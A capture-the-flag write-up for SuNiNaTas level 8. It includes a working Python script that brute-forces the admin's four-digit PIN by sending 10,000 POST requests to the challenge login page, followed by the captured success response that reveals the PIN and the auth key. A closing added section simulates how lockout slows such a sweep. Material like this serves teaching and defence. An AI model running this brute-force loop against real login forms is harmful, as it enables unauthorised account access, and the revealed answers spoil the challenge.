[SuNiNaTas] level 8

ch4rli3kop 2019. 4. 13. 21:52
Suninatas level 8

keyword : brute force

<!-- Hint : Login 'admin' Password in 0~9999 -->
<!-- M@de by 2theT0P -->

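This looks like a brute-force challenge.

Capturing the login request with Fiddler after entering an id and pw showed that the id and pw are placed in the body and sent as a POST request.

Writing something like the following code and running it is enough.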

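import urllib.request

target = 'http://suninatas.com/Part_one/web08/web08.asp'
r = urllib.request.Request(target)
# ASP session cookie sent along with every request
r.add_header("Cookie", "ASPSESSIONIDCSAARTSC=KELNKLFBEBIHLHILKGKJNOBN")
# The hint says 0~9999, so the upper bound must be 10000 to include 9999
for i in range(0, 10000):
    pw = str(i).zfill(4)
    # Passing a body makes urlopen send a POST request
    data = urllib.request.urlopen(r, ('id=admin&pw=' + pw).encode('utf-8')).read()
    print(pw)
    # The success page contains the string "Authkey"
    if b'key' in data:
        break
print(data)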

It hit at 7707!

7704
7705
7706
7707
b'\r\n\t\t<script>alert(\'Congratulation!\');</script>\r\n\t\r\n\r\n<html>\r\n\t<title>Game No.8</title>\r\n\t<head><link href="/include/style.css" rel="stylesheet" type="text/css"></head>\r\n\t<BODY>\r\n\t\t<form method="Post" action="./web08.asp">\r\n\t\t<br>\r\n\t\t\t\t<br>\r\n\t\t\t\t\t\t<br>\r\n\t\t\t\t\t\t\t\t<br>\r\n\t\t\t\t\t\t<br>\t\t\t\t\t\t\r\n\t\t\t\t<br>\r\n\t\t<br>\r\n\t\t<table width="240" cellpadding="0" cellspacing="0" align="center">\r\n\t\t\t\t<tr height="30">\r\n\t\t\t\t\t<td width="50%" class="table_top" align="center"><input type="button" name="main_btn" value="main" style="width:60" onclick="location.href=\'/main/main.asp\'"></td>\r\n\t\t\t\t\t<td width="50%" class="table_top" align="center"><input type="button" name="main_btn" value="Back" style="width:60" onclick="history.back()"></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr height="30" class="table_main" >\r\n\t\t\t\t\t<td width="120" align="center" bgcolor="cccccc"><font size="2"><b>ID</b></font></td>\r\n\t\t\t\t\t<td width="120" align="center" bgcolor="cccccc"><input type="text" name="id" style="width:90" ></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr height="30" class="table_main" >\r\n\t\t\t\t\t<td align="center" bgcolor="cccccc"><font size="2" ><b>PW</b></font></td>\r\n\t\t\t\t\t<td align="center" bgcolor="cccccc"><input type="password" name="pw" style="width:90" maxlength="4" ></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr height="30">\r\n\t\t\t\t\t<td colspan="2" align="center" class="table_top" bgcolor="cccccc"><input type="button" name="btn" value="Login" onclick="submit()" size=20></td>\r\n\t\t\t\t</tr>\r\n\t\t\t\t<tr class="table_main" height="30">\r\n\t\t\t\t\t<td colspan="2" align="center" bgcolor="cccccc">Authkey : l3ruteforce P@ssword</td>\r\n\t\t\t\t</tr>\r\n\t\t\t</table>\r\n\t\t</form>\r\n\t</BODY>\r\n</html>\r\n\r\n\r\n<!-- Hint : Login \'admin\' Password in 0~9999 -->\r\n<!-- M@de by 2theT0P -->'
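The server-side view of why this sweep works, as an added example that is not part of the original write-up or the challenge's code: the same sequential 0000..9999 order is replayed against a login check with and without a failure lockout. The LoginGate class, the 5-failure / 15-minute policy and the 100 ms request spacing are assumptions made for illustration.

```python
import hmac

KEYSPACE = 10_000        # 4-digit PIN space from the page's hint (0~9999)
LOCK_MS = 15 * 60_000    # assumed policy: 15-minute lock


class LoginGate:
    """Hypothetical login check with a per-account failure counter and timed lock."""

    def __init__(self, accounts, max_failures):
        self.accounts = accounts          # {user: pin}, constructed sample data
        self.max_failures = max_failures
        self.failures = {}                # user -> consecutive failures
        self.locked_until = {}            # user -> unlock time in ms

    def attempt(self, user, pin, now_ms):
        if now_ms < self.locked_until.get(user, 0):
            return "locked"               # rejected before the PIN is compared
        expected = self.accounts.get(user, "")
        if expected and hmac.compare_digest(expected, pin):
            self.failures[user] = 0
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= self.max_failures:
            self.locked_until[user] = now_ms + LOCK_MS
            self.failures[user] = 0
        return "fail"


def replay_sweep(gate, user, ms_per_request=100):
    """Replay the sequential 0000..9999 sweep; return (outcome, PINs actually compared)."""
    compared = 0
    for i in range(KEYSPACE):
        result = gate.attempt(user, str(i).zfill(4), i * ms_per_request)
        if result != "locked":
            compared += 1
        if result == "ok":
            return "ok", compared
    return "exhausted", compared


ACCOUNTS = {"admin": "7707"}              # constructed; PIN value taken from the write-up
OPEN = replay_sweep(LoginGate(ACCOUNTS, max_failures=KEYSPACE + 1), "admin")
GATED = replay_sweep(LoginGate(ACCOUNTS, max_failures=5), "admin")

if __name__ == "__main__":
    print("no lockout:  ", OPEN)
    print("lock after 5:", GATED)
```

Lockout only slows the search: at five guesses per 15 minutes a 10,000-value space still falls in about three weeks, and a lock keyed on the account name lets anyone lock out admin, so a longer secret and per-client rate limits are needed alongside it.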

